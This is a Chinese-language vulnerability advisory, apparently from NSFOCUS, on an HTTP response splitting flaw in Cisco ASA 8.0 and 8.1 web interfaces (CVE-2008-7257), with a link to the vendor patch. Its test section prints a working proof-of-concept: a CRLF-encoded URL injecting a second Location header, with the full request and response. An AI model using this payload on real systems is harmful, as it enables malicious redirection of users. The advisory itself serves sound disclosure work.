安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Cisco ASA HTTP响应拆分漏洞
发布日期:
2010-06-25
更新日期:
2010-06-28
受影响系统:
Cisco ASA 8.1
Cisco ASA 8.0
不受影响系统:
Cisco ASA 8.1(2)
描述:
BUGTRAQ ID:
41159
CVE ID:
CVE-2008-7257
Cisco自适应安全设备(Adaptive Security Appliances, ASA)是可提供安全和VPN服务的模块化平台。
Cisco ASA没有正确地验证用户所提供输入,远程攻击者可以通过提交特制的URL请求执行HTTP响应拆分攻击。
当用户通过HTTP连接到ASA的Web界面时,会被自动重新定向到SSL加密的版本,Web服务器向正在连接的客户端发布301 Moved Permanently状态代码以方便这种重新定向。如果客户端向URL附加了回车(%0d)和换行(%0a)符,Web服务器在解析时就会允许客户端注入任意HTTP响应头。通过这种方式就可以向客户端注入第二个Location头,而客户端的web浏览器仅会对所遇到的最后一个Location头执行操作并重新定向至该处。
<*来源:Daniel King
链接:
http://marc.info/?l=bugtraq&m=127748777510403&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
URL:
http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom
请求:
GET
http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom
HTTP/1.0
Host: /www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
响应:
HTTP/1.0 301 Moved Permanently
Server: Web Server
Location: https:///www.example2.com/
Location: http:///www.example3.com
Content-Type: text/html
Content-Length: 125
<HEAD><TITLE>Moved</TITLE></HEAD><BODY><A HREF="
https://x.x.x.x/
Location:
http://www.example2.com>Moved</A></BODY>
建议:
厂商补丁:
Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html
浏览次数:
2528
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客